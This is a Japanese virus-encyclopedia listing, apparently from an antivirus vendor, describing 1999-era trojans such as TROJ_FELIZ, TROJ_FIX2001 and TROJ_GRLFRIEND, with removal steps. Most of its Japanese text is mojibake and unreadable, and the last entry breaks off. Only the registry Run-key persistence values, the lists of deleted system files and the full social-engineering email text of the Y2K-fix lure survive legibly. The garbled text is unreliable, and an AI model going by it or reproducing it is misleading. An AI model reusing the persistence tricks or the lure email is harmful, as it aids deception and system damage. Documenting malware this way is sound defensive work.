WindowsNT´Ä¶­¤Î¾ì¹ç¤Ïޤ¹¹¤Ë°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼" run"¤Ë"_setup.exe"¤È¤¤¤¦ÃͤòÉÕ¤±²Ã¤¨Ž¤ºÆµ¯Æ°»þ¤Î¥¤¥ó¥¹ ¥È¡¼¥ë¤òÀßÄꤷ¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows ¤³¤Î¤è¤¦¤Ë¤·¤Æ¥ê¥â¡¼¥È¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤¿¾ì¹ç¤Ïޤ¥×¥í¥° ¥é¥à¤òñÂΤǼ¹Ԥ·¤¿¾ì¹ç¤È¤Ï°Û¤Ê¤êޤ¼¡²óµ¯Æ°»þ¤Ë¡É_ setup.exe¡É¤¬¼Â¹Ô¤µ¤ì¤ë¤³¤È¤Ë¤Ê¤ê¤Þ¤¹Ž¡¤³¤Î¤¿¤áޤµ¯Æ°»þ ¤Ë°Ê²¼¤Îµ¶¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤Þ¤¹Ž¡
"Cannot open file: it does not appear to be a valid
archive. If this file is part of a ZIP format backup set, insert the last disk of the backup set and try again. Please press F1 for help." *WindowsNT¤Î¾ì¹ç¤Ï°Ê¸åµ¯Æ°»þ¤ËËè²ó¾å¤Î¥á¥Ã¥»¡¼¥¸¤¬É½ ¼¨¤µ¤ì¤Þ¤¹Ž¡¤·¤«¤·Ž¤ 95/98¤Î¾ì¹ç¤ÏޤºÆµ¯Æ°¸å¤ËWIN.INI¤Î µ­½Ò¤ò¡Érun=¡Éexplore.exe¡É¤È½ñ´¹¤¨Ž¤Explore.exe¤¬¼Â¹Ô ¤µ¤ì¤ë¤è¤¦ÀßÄꤷľ¤¹¤¿¤áޤ¼¡²ó¤«¤é¤Ïɽ¼¨¤µ¤ì¤Ê¤¯¤Ê¤ê¤Þ ¤¹Ž¡
È÷¡¡¡¡¹Í:¼êưºï½ü¼ê½ç
¢£Windows95/98 1.¡¡ WIN.INI¥Õ¥¡¥¤¥ë¤Îޤ°Ê²¼¤Îµ­½Ò¤òºï½ü¤·¤Þ¤¹Ž¡
"run=C:\WINDOWS\SYSTEM\Explore.exe"¡¡¤Þ¤¿¤Ï¡¢¡Érun =
_setup.exe¡É 2. ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹Ž¡
3. "C:\WINDOWS\SYSTEM\"¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Î"EXPLORE.EXE
"¡¡¤È¡¢WIN.INI ¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¤È¤³¤í¤Ë¤¢¤ë¡È_setup.exe ¡É¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤¹Ž¡ ¢£Windows NT
£±¡¥ °Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Î"run"¤ÎÃÍ"c:\winnt\system32\
Explore.exe" ¡Ê¤Þ¤¿¤Ï¡È_setup.exe¡É¡Ë¤òºï½ü¤·¤ÆÃͤò¶õ ¤Ë¤·¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows £²¡¥¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹Ž¡
£³¡¥"C:\WINNT\SYSTEM32\"¥Ç¥£¥ì¥¯¥È¥ê¤Î"EXPLORE.EXE"¤Þ
¤¿¤ÏWIN.INI ¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¾ì½ê¤Ë¤¢¤ë¡È_setup.exe¡É¤¤ ¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤¹Ž¡

TROJ_EZKILL


̾¡¡¡¡¾Î:TROJ_EZKILL

ÊÌ¡¡¡¡Ì¾:¤Ê¤·

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win 9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:796 Kb

¾Ü¡¡¡¡ºÙ:TROJ_EZKILL¤Ï32bit·Á¼°¤Î¥È¥í¥¤¤ÎÌÚÇÏ
·¿Ç˲õ¥×¥í¥°¥é¥à¤Ç¤¹¡£´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤÏICQ¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Èµ¶¤Ã¤ÆÎ®ÉÛ ¤µ¤ì¤Þ¤·¤¿¡£Â¾¤ÎICQ¥æ¡¼¥¶¡¼¤ò¥Ï¥Ã¥­¥ó¥°¤Ç¤­¤ë¤È¤¤¤¦¿¨ ¤ì¹þ¤ß¤Ç¤¹¤¬¡¢¼ÂºÝ¤Ë¤Ï¼Â¹Ô¤µ¤ì¤¿¥Þ¥·¥ó¤Î¥·¥¹¥Æ¥à¤òÇË ²õ¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£
Ç˲õ³èư:
¡¡¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È°Ê²¼¤Î2¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ ¤¹¡£
¡¡c:\windows\win.com

¡¡c:\windows\system\vmm32.vxd

TROJ_FELIZ


̾¡¡¡¡¾Î:TROJ_FELIZ

ÊÌ¡¡¡¡Ì¾:FELIZ, Feliz.exe, FELIZ.TROJAN, FELIZ_ANO_
NOVO
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¾Ü¡¡¡¡ºÙ:-¡¡¡¡
¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤ ¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¤¬°­¼Á¤ÊÇ˲õ³èư¤ò¹Ô¤¤¤Þ ¤¹¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϵ¯Æ°¤µ¤ì¤ë¤ÈÊ£¿ô¤Î¥á¥Ã¥»¡¼¥¸¥Ü¥Ã ¥¯¥¹¤òɽ¼¨¤·¤Þ¤¹¡£¥á¥Ã¥»¡¼¥¸¤Ï¥Ý¥ë¥È¥¬¥ë¸ì¤Î¤¿¤á¡¢¥Ý ¥ë¥È¥¬¥ë¸ì´Ä¶­¤â¤·¤¯¤Ï¥¹¥Ú¥¤¥ó¸ì´Ä¶­¤Ç¤Ê¤¤¤ÈÀµ¾ï¤Ëɽ ¼¨¤µ¤ì¤Þ¤»¤ó¡£ºÇ½ªÅª¤Ë¤ÏWindows¤ÎºÆµ¯Æ°¤òÂ¥¤·¤Þ¤¹¤¬¤½ ¤Î΢¤Ç°Ê²¼¤ÎWindows¤Î½ÅÍפʥ·¥¹¥Æ¥à¥Õ¥¡¥¤¥ë¤Îºï½ü¤ò»î ¤ß¤Þ¤¹¡£
c:\windows\system.dat,

c:\windows\user.dat,

c:\command.com,

c:\windows\command\command.com,

c:\windows\system.ini,

c:\windows\win.ini,

c:\windows\system.cb, and

c:\windows\win.com
¡¡¥Õ¥¡¥¤¥ë¤òºï½ü¤µ¤ì¤¿¥Þ¥·¥ó¤ÏWindows¤ÎGUI¤¬µ¯Æ°¤Ç¤­ ¤Ê¤¯¤Ê¤ê¡¢DOS¥×¥í¥ó¥×¥È¤Î¾õÂ֤Ǥ·¤«µ¯Æ°¤·¤Ê¤¯¤Ê¤ê¤Þ ¤¹¡£Ç˲õ¤µ¤ì¤¿¥·¥¹¥Æ¥à¤ÏWindows¤ÎºÆ¥¤¥ó¥¹¥È¡¼¥ë¤ò¹Ô¤¦ ¤³¤È¤Ë¤è¤ê½¤Éü¤Ç¤­¤Þ¤¹¡£
È÷¡¡¡¡¹Í:
¡¡¥á¥Ã¥»¡¼¥¸¥Ü¥Ã¥¯¥¹¤Ï°Ê²¼¤Î½çÈÖ¤Ëɽ¼¨¤µ¤ì¤Þ¤¹¡£¤¹¤Ù
¤Æ¤Î¥á¥Ã¥»¡¼¥¸¤Ï¥Ý¥ë¥È¥¬¥ë¸ì¤Ç¤¹:
£±¡Ë°­Ëâ¤Î¼Ì¿¿¤Ë"FELIZ ANO NOVO"¡Ê¥Ý¥ë¥È¥¬¥ë¸ì¤Ç" Happy New Year"¤Î°ÕÌ£¡Ë¤Îʸ»úÎó
£²¡Ë¥¿¥¤¥È¥ë¡ÖAttention!!!¡×¡¢ËÜʸ:¡ÖRestart
computer now!!!¡×
£³¡Ë¥¿¥¤¥È¥ë¡ÖAttention!!!¡×¡¢ËÜʸ:¡ÖAll good
verifies this before !!!¡×
£´¡Ë¥¿¥¤¥È¥ë¡ÖAttention!!!¡×¡¢ËÜʸ:¡Ötherefore this
is a millennium bug !!!¡×
£µ¡Ë¥¿¥¤¥È¥ë¡ÖAdvice of Friend !!!¡×¡¢ËÜʸ:¡Öit
never executes an archive of unknown origin !!!¡×
£¶¡Ë¥¿¥¤¥È¥ë¡ÖTchau !!!¡×¡¢ËÜʸ:¡ÖA Happy New Year!!
! Still well that I informed you !!!¡× ¡¡ºÇ¸å¤Ë¡Ö¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Î¤¿¤á¡¢Windows¤òºÆµ¯Æ°¤·¤Æ ¤¯¤À¤µ¤¤¡×¤È¤¤¤¦»Ý¤Î¥á¥Ã¥»¡¼¥¸¤¬¤Ç¤Þ¤¹¡£

TROJ_FIX2001


̾¡¡¡¡¾Î:TROJ_FIX2001

ÊÌ¡¡¡¡Ì¾:FIX2001, W32/FIX2001

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win 9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:12288bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏHappy99¤ËÎà»÷¤·¤¿¥ï¡¼¥à¤ËʬÎव¤ì¤ëÉÔ
Àµ¥×¥í¥°¥é¥à¤Ç¡¢¼Â¹Ô¤¹¤ë¤ÈY2K¤Î·Ù¹ð¥á¥Ã¥»¡¼¥¸¤ò¤Ä¤±¤¿ ÅŻҥ᡼¥ë¤ò¾¡¼ê¤ËÁ÷¿®¤·¤Þ¤¹¡£¥á¡¼¥ë¤Î¥¿¥¤¥È¥ë¤Ï¡È Internet problem year 2000¡É¡¢¤Þ¤¿Á÷¿®¼Ô¤Î̾Á°¤Ï¡¢¡È Administrator¡É¤È¤Ê¤Ã¤Æ¤ª¤ê¡¢Y2KÌäÂê¤ò²óÈò¤¹¤ë½¤Àµ¥× ¥í¥°¥é¥à¤Èµ¶¤Ã¤ÆÁ÷¿®¤µ¤ì¤Æ¤¤¤Þ¤¹¡£ ¤³¤Î¥ï¡¼¥à¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º°Ê²¼¤Î¥á¥Ã¥» ¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹¡£ ¡ÈY2K Ready!!¡É¡ÈYour Internet Connection is already Y2K, you don¡Çt need to upgrade it.¡É ¤³¤Î´Ö¤Ë¡¢¼«Ê¬¼«¿È¤ÎÊ£À½(fix2001.exe)¤òWindows¥Ç¥£¥ì ¥¯¥È¥ê¤Î¤Ê¤«¤ËºîÀ®¤·¡¢¼¡¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃͤòÉÕ ¤±²Ã¤¨¤Þ¤¹¡£¤³¤Î¤¿¤á¡¢¼¡²ó¤Î¥·¥¹¥Æ¥àµ¯Æ°»þ¤«¤é¡¢É¬¤º ¤³¤Î¥ï¡¼¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\run Fix2001 = "fix2001.exe" ºÆµ¯Æ°¸å¡¢¥æ¡¼¥¶¡¼¤¬¥á¡¼¥ë¤òÁ÷¿®¤¹¤ë¤È¡¢¤½¤ÎÁê¼ê¤ËÂÐ ¤·¤Æ¡¢¥ï¡¼¥à¥×¥í¥°¥é¥à¼«¿È¤Ç¤¢¤ëFix2001.exe¤òźÉÕ¤·¤¿ ¥á¡¼¥ë¤ò¼«Æ°Åª¤ËÁ÷¿®¤·¤Þ¤¹¡£ ¥á¡¼¥ë¤ÎÆâÍÆ¤Ï¡¢±Ñ¸ì¤È¥¹¥Ú¥¤¥ó¸ì¤Ç°Ê²¼¤Î¤è¤¦¤Ë½ñ¤«¤ì ¤Æ¤¤¤Þ¤¹¡£
±Ñ¸ì:

"Internet Customer:
We will be glad if you verify your Operative System(s) before Year 2000 to avoid problems with your Internet Connections. If you are a Windows 95 / 98 user, you can check your system using the Fix2001 application that is attached to this E- Mail or downloading it from Microsoft (C) WEB
Site: HTTP://WWW.MICROSOFT.COM If you are using
another Operative System, please don¡Çt wait until Year 2000, ask your OS Technical Support. Thanks.Administrator."
¥¹¥Ú¥¤¥ó¸ì:

¡ÈEstimado Cliente: Rogamos
actualizar y/o verificar su Sistema Operativo para el correcto funcionamiento de Internet a partir del A o 2000. Si Ud. Es usuario de Windows 95 / 98 puede hacerlo mediante el Software provisto por Microsoft & copy; llamado –Fix2001- que se encuentra adjunto en este E-Mail o bien puede ser descargado
del sitio WEB de Microsoft © HTTP://WWW.
MICROSOFT.COM Si Ud. Es usuario de otros Sistemas Operativos, por favor, no deje de consultar con sus respectivos soportes tecnicos. Muchas Gracias. Administrador.¡É
È÷¡¡¡¡¹Í:¥³¡¼¥ÉÆâ¤Ë¤Ï°Ê²¼¤Î¥Æ¥­¥¹¥È¤¬´Þ¤Þ¤ì¤Æ¤¤¤Þ¤¹

:

±Ñ¸ì:

¡ÈTHE REAL KEY TO LIVE A HAPPY LIFE, IS: BE A GOOD
MAN.¡É
¥¹¥Ú¥¤¥ó¸ì:
¡ÈPARA CONSEGUIR LA VERDADERA FELICIDAD, SE UN BUEN TIPO.¡É ¢£ ¼êưºï½ü¼ê½ç¡Ê¶î½ü¤Ï¤Ç¤­¤Ê¤¤¡Ë 1.¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤òºï½ü¤¹¤ë¡£HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\run Fix2001 = "fix2001.exe" 2.¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë¡£ 3.fix2001.exe¤òºï½ü¤¹¤ë¡£ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_FLASHKILLER


̾¡¡¡¡¾Î:TROJ_FLASHKILLER

ÊÌ¡¡¡¡Ì¾:FLASH.KILL

¥¦¥¤¥ë¥¹¥µ¥¤¥º:4,096 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1999

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤ÏޤCIH¥¦¥¤¥ë¥¹¤Î¥½¡¼¥¹¤òÍøÍѤ·¤ÆºîÀ®
¤µ¤ì¤¿¥È¥í¥¤¤ÎÌÚÇÏ·¿Ç˲õ¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡PE_CIH¤Î¤è¤¦ ¤Ë´¶À÷Ž¥ÀøÉú¤¹¤ë¤³¤È¤Ï¤Ê¤¯Ž¤¼Â¹Ô¤µ¤ì¤¿¤È¤¿¤óÇ˲õ³èư¤ò ³«»Ï¤¹¤ëŽ¡ -¡¡¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤ÈޤHDD¤ÎºÇ½é¤Î1¥Ð¥¤¥È¤ò¤Ç¤¿ ¤é¤á¤Ê¾ðÊó¤Ç¾å½ñ¤­¤·¤Æ¾Ãµî¤¹¤ëŽ¡¤³¤Î¤¿¤áޤHD¤Î¥Ç¡¼¥¿¤¬ ¤¹¤Ù¤Æ¼º¤ï¤ì¤Æ¤·¤Þ¤¦Ž¡¤µ¤é¤Ë½ñ¤­¹þ¤ß²Äǽ¤ÊFlashBIOS¤ò »ÈÍѤ·¤Æ¤¤¤ë¤Èޤ¤³¤ì¤âÇ˲õ¤·Ž¤¥Þ¥·¥ó¤òµ¯Æ°ÉÔ²Äǽ¤Ë¤·¤Æ ¤·¤Þ¤¦Ž¡
È÷¡¡¡¡¹Í:-¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤώ¤Windows 95, Windows
98, Windows NT ¾å¤Çưºî²Äǽ¤À¤¬Ž¤NT¤Ç¤ÏHDD¤Ë¥À¥á¡¼¥¸ ¤òµÚ¤Ü¤¹¤³¤È¤Ï¤Ê¤¤Ž¡

TROJ_FOOLED


̾¡¡¡¡¾Î:TROJ_FOOLED

ÊÌ¡¡¡¡Ì¾:Trojan.FTBC

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:137¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¡ÈTB-Clean stinks!!!
¡É¤Èɽ¼¨¤¹¤ë¤À¤±¤Ç¡¢Ç˲õ³èư¤Ï¹Ô¤Ê¤ï¤Ê¤¤¡£ ¡öȯ¸«¤·¤¿¤È¤­¤Ë¤Ï¡¤¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£

TROJ_GABAN_2


̾¡¡¡¡¾Î:TROJ_GABAN_2

ÊÌ¡¡¡¡Ì¾:BACKDOOR.VCR

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:312,353¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:Back Orifice¥¦¥¤¥ë¥¹¤Ë»÷¤¿¡¢¥Í¥Ã¥È¥ï¡¼¥¯¾å
¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¢¤ë¡£ ¡¡Â¾¿Í¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ËǦ¤Ó¹þ¤à¥µ¡¼¥Ð¡¼¡¦¥â¥¸¥å¡¼¥ë ¤È¡¢¥Ï¥Ã¥«¡¼¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤¹¤ë¤¿¤á¤Î¥¯¥é¥¤ ¥¢¥ó¥È¡¦¥â¥¸¥å¡¼¥ë¤È¤«¤é¤Ê¤ë¡£¥µ¡¼¥Ð¡¼¡¦¥â¥¸¥å¡¼¥ë¤¬ ¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ø¤Î´¶À÷¤ËÀ®¸ù ¤·¤¿¾ì¹ç¡¢¥Ï¥Ã¥«¡¼¤ÏIP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¡¢¥¯¥é¥¤¥¢¥ó¥È ¡¦¥â¥¸¥å¡¼¥ë¤òÍѤ¤¤Æ¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ò¤µ¤Þ¤¶¤Þ¤ËÁàºî ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£Î㤨¤Ð¡¢¥Õ¥¡¥¤¥ë¤ò°Üư¤µ¤»¤¿¤ê¾Ãµî ¤·¤¿¤ê¡¢¥¦¥£¥ó¥É¥¥¥º¡¦¥·¥¹¥Æ¥à¤òÍѤ¤¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Î ÀßÄê¤ò¹Ô¤Ê¤Ã¤¿¤ê¤¹¤ë¤³¤È¤¬²Äǽ¤È¤Ê¤ë¡£
È÷¡¡¡¡¹Í:¼Â¹Ô¤¹¤ë¤È°Ê²¼¤Î¤è¤¦¤Ê¥¦¥£¥ó¥É¥¦¤òɽ¼¨¤¹¤ëŽ¡
[][][][][][][][]=[GABAN BUS 2.0]=[][][][][][][][] Loading..... Loaded Day Wednesday 23 June 1999
Loaded Time 3:35:57 PM - 15|35|57
System Resources..... Free Memory 0KB Windows Version -4.10 G A B A N B U S 2.0 BY E.RAMESH [ Stringer - Gaban INC. ] [ This Window Will Remain - GB2 ]

TROJ_GOTYOU


̾¡¡¡¡¾Î:TROJ_GOTYOU

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1ޤ094¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:- ¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤êޤ
´¶À÷¤Ï¤·¤Ê¤¤Ž¡ - ´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Æ¥­¥¹¥È¥Õ¥¡¥¤¥ë¡ÉBAT.DAT ¡É¤òºîÀ®¤¹¤ë¡Ê¤³¤Î¥Õ¥¡¥¤¥ë¤Ë¤Ï¡Éy GOTYOU¡É¤È¤¤¤¦¥Æ¥­ ¥¹¥È¤¬´Þ¤Þ¤ì¡¢¥¦¥¤¥ë¥¹¤¬¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò¥Õ¥©¡¼¥Þ¥Ã¥È ¤¹¤ëºÝ¤ËÍѤ¤¤ë¥Ñ¥é¥á¡¼¥¿¡¼¤Ë¤Ê¤ë¡Ë¡£ - ¤½¤Î¸å¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò¥Õ¥©¡¼¥Þ¥Ã¥È¤¹¤ë¥×¥í¥°¥é¥à ¤ò¸Æ¤Ó½Ð¤¹¡£¡Ö¤Û¤ó¤È¤¦¤Ë¥Õ¥©¡¼¥Þ¥Ã¥È¤·¤Þ¤¹¤«¡©¡×¤È¤¤ ¤¦³Îǧ¤ËÂФ·¤Æ¡¢¥¦¥¤¥ë¥¹¤Ï¼«Æ°Åª¤Ë¡Ö¤Ï¤¤¡×¡Ê¡ÉY¡É¡Ë¤È Åú¤¨¡¢¤Ä¤Å¤¤¤Æ¡¢¥Ü¥ê¥å¡¼¥à¥é¥Ù¥ë¤ò¿Ö¤«¤ì¤ë¤È¡¢¡É GOTYOU¡É¤È̾Á°¤ò¤Ä¤±¤ë¡£ ¡¡
»³²:
¡¡¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò¥Õ¥©¡¼¥Þ¥Ã¥È¤¹¤ë¡£

TROJ_GRLFRIEND


̾¡¡¡¡¾Î:TROJ_GRLFRIEND

ÊÌ¡¡¡¡Ì¾:TROJ_GRLFRIEND-1, TROJ_GRLFRIEND-2

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win16 / Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:425,984 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
´¶À÷¤Ï¤·¤Ê¤¤¡£¼Â¹Ô¤¹¤ë¤È¡¢¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤Ë¤è¤Ã¤Æ ¹¶ ·â¼Ô¤¬¥æ¡¼¥¶¡¼¤Ë¤Ä¤¤¤Æ¤Î¾ðÊó¤ò¡¢¼èÆÀ¤Ç¤­¤ë¤è¤¦¤Ë¤¹¤ë ¤¿¤á¤Î¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ Î㤨¤Ð¡¢Windows¤Ë¥í¥°¥¤¥ó¤¹¤ë¤¿¤á¤Ë¥Ñ¥¹¥ï¡¼¥É¥Õ¥£¡¼¥ë ¥É¤Ë¥Ñ¥¹¥ï¡¼¥É¤òÆþÎϤ¹¤ë¤È¡¢¹¶·â¼Ô¤Ï¤³¤Î¥Æ¥­¥¹¥È¾ðÊó ¤ò¼èÆÀ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¤½¤Î¤Û¤«¹¶·â¼Ô¤Ë¤Ï¡¢¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤò¼Â¹Ô¤·¤Æ¤·¤Þ¤Ã ¤¿¡Öµ¾À·¼Ô¡×¤Î¥Þ¥·¥ó¤ËÂФ·¤Æ¡¢°Ê²¼¤Î¼Â¹Ô¤¬²Äǽ¤Ç¤¢¤ë
:
¡¦¡Ö¥·¥¹¥Æ¥à¡×¥á¥Ã¥»¡¼¥¸¤òÁ÷¤ë ¡¦²»¤òÌĤ餹 ¡¦¥Ó¥Ã¥È¥Þ¥Ã¥×¡Ê .bmp ²èÁü¡Ë¤ò¸«¤»¤ë ¡¦¾¡¼ê¤ËŬÅö¤Ê¥Û¡¼¥à¥Ú¡¼¥¸¤òɽ¼¨¤µ¤»¤ë¡£ ¡¦¥µ¡¼¥Ð¡¼¤Î¥Ý¡¼¥È¤òÊѹ¹¤¹¤ë ¡¦ BOSSKEY ¡á F£±£² ¤Ç GF ¥¯¥é¥¤¥¢¥ó¥È¤ò±£¤¹¡£ ¡¦´¶À÷¤·¤Æ¤¤¤ë¥µ¡¼¥Ð¡¼¤òõ¤¹¤¿¤á¡¢¥µ¥Ö¥Í¥Ã¥È¤òÁöºº¤µ ¤»¤ë¡£ ¡¦¥µ¡¼¥Ð¡¼¤ËÂФ·ping¥³¥Þ¥ó¥É¤ò¼Â¹Ô¤¹¤ë¡£ ¡¦¥¦¥¤¥ó¥É¥¦¥ê¥¹¥È¤òÊݸ¤¹¤ë¡£ ¥æ¡¼¥¶¡¼¤¬¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¡¢windll. exe¤È¤¤¤¦Ì¾¾Î¤Ç¡¢¼«Ê¬¼«¿È¤Î¥³¥Ô¡¼¤òWindows¥Ç¥£¥ì¥¯¥È ¥ê¤ËºîÀ®¤¹¤ë¡£¼¡¤Ë¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤ò½ñ¤­´¹¤¨ ¤Æ¡¢µ¯Æ°»þ¤Ëɬ¤º¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
ÃÍ:"Windll.exe=\windll.exe"
TROJ_GRLFRIEND¤Ï¡¢¥³¥ó¥Ô¥å¡¼¥¿¤Ë¾ïÃó¤·¡¢¥æ¡¼¥¶¡¼¤Îư ºî¤ò´Æ»ë¤¹¤ë¡£ ¥æ¡¼¥¶¡¼¾ðÊóÅù¤Î¥Ç¡¼¥¿¤Ï°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤ËÊݸ¤¹¤ë¡£ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\General
È÷¡¡¡¡¹Í:¼êưºï½ü¼ê½ç:
£±¡¥¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤Ç°Ê²¼¤ÎÃͤòºï½ü¤¹¤ë¡£ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
ÃÍ:"Windll.exe=\windll.exe"
£². windll.exe¤òºï½ü¤¹¤ë¡£

TROJ_HACKDREAM


̾¡¡¡¡¾Î:TROJ_HACKDREAM

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win32

¾Ü¡¡¡¡ºÙ:¼Â¹Ô¤¹¤ë¤È¡¢the Hacker Dream Utilities ¤ò¤É
¤³¤Ë¥»¥Ã¥È¥¢¥Ã¥×¤¹¤ë¤«¤È¤¤¤¦¥À¥¤¥¢¥í¥°¥Ü¥Ã¥¯¥¹¤¬É½¼¨ ¤µ¤ì¤ë¡£¤³¤ì¤ò»ØÄꤷ²òÅह¤ë¤È¡¢¥á¥Ã¥»¡¼¥¸¥Ü¥Ã¥¯¥¹¤¬ ɽ¼¨¤µ¤ì¤ë¡£ ¤½¤·¤Æ¡¢System.ini¥Õ¥¡¥¤¥ë¤Î[TTFontDimenCache]¥»¥¯¥· ¥ç¥ó¤Ë°Ê²¼¤ò½ñ¤­²Ã¤¨¤ë¡£ 0 4 = 2 4 0 5 = 3 5 . . .
¾É¾õ:
